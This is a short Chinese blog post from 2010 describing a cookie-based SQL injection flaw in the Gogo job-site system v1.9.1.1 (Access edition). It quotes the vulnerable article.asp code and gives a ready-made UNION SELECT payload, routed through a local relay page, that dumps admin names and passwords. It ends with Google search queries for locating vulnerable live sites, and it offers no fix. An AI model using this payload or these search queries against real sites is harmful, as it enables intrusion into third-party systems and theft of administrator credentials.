Gogo人才网系统v1.9.1.1(access版)Cookies注入漏洞

2010, April 8, 9:11 AM. 漏洞分析
Submitted by admin

Gogo人才网系统v1.9.1.1(access版)存在Cookies注入漏洞
漏洞文件:article.asp
问题代码:sql="select c_name from article_c where id="&request("class")
由于防注入防了querystring和form,我们可以Cookies注入。
用注入中转生成一个asp页面,本地搭建asp环境,注入语句:http://localhost/jmCook.asp?jmdcw=1%20and%201=2%20union%20select%20gogo_name%2b%27%2a%27%2bgogo_pwd%20from%20gogo_admin

大小: 54.82 K
尺寸: 500 x 275
浏览: 65 次
点击打开新窗口浏览全图

也可以用GreenBrowser自带 的JS插件,填写如图:

大小: 80.65 K
尺寸: 500 x 347
浏览: 63 次
点击打开新窗口浏览全图大小: 66.93 K
尺寸: 500 x 405
浏览: 75 次
点击打开新窗口浏览全图大小: 64.6 K
尺寸: 478 x 467
浏览: 57 次
点击打开新窗口浏览全图

Google:用户登录 个人注册 企业注册 设为首页 加为收藏
或者 inurl:gogo_add_guest.asp
或者 inurl:systemarticle.asp?id=
伟大祖国人才济济丫!
んㄗ葑訫鎖愛'S Blog http://www.virusest.com/

Tags: gogo, cookies

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):